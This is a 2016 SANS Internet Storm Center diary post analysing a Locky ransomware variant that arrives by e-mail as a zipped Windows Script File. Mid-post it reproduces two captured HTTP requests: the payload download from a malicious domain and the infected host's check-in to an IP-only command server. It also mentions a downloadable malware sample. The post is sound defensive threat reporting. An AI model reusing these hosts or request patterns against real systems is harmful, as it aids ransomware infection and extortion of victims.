Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: Internet Storm Center - Internet Security | DShield Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Last Daily Podcast (Tue, Aug 30th):CA WoSign Lax Validation Policy;

Latest Diaries

Today's Locky Variant Arrives as a Windows Script File

Published: 2016-08-30
Last Updated: 2016-08-30 13:42:35 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Pretty much all the Locky variants I have looked at the last couple days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. "Windows Script" is essentially JavaScript. The only difference is the tag at the beginning of the file.

Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.

GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0;
 .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive

Just like earlier versions, it then "registers" the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:

POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; 
.NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive  

[post data omitted]

Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: "blind chicken" ).

Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

View All Diaries →

Latest Discussions

Why flex css properties does not work on Safari.
created 11 hours ago by Mike (0 replies)

Blacklist ordb.org
created 1 day ago by Hausi (0 replies)

New telnet attack? command injection against telnet...
created 6 days ago by EricWedaa (2 replies)

SWIFT frauds
created 6 days ago by RAJASEKHARAN (0 replies)

IS Audit of DC and DR
created 6 days ago by RAJASEKHARAN (0 replies)

View All Forums →

Latest News

View All News →

Top Diaries

Critical Cisco ASA IKEv1/v2 Vulnerability. Active Scanning Detected
6 months ago by Dr. J. (25 comments)

Data Classification For the Masses
1 week ago by Xme (14 comments)

An Approach to Vulnerability Management
2 months ago by Russell (13 comments)

Using File Entropy to Identify "Ransomwared" Files
3 weeks ago by Rob VandenBrink (2 comments)

Voice Message Notifications Deliver Ransomware
1 week ago by Xme (6 comments)